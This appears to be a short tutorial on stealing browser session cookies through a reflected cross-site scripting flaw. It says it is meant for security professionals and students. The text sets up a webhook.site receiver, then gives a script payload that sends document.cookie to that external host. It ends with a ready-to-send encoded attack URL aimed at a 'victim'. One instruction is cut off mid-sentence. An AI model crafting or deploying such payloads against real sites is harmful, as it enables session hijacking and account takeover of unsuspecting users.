Disclaimer: This video is intended for Cyber Security professionals and Students who are looking to help others stay safe online.
We can leverage the following website so that we do not need our own webserver. https://webhook.site/
With a webhook in hand, we’re ready to craft our payload. Our payload should look like this. We’ll want to make sure we replace the URL with our generated webhook address.
A simple test can first be created with this:
<img src="[URL]/test.jpg" /> http://[URL]/test.js
<script> document.write('<img src="[URL]?c='+document.cookie+'" />'); </script>
Before sending the link to the victim, make sure you encode the + symbols by replacing them with
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>
Check out my other posts that discuss how you can protect yourself from these type of attacks.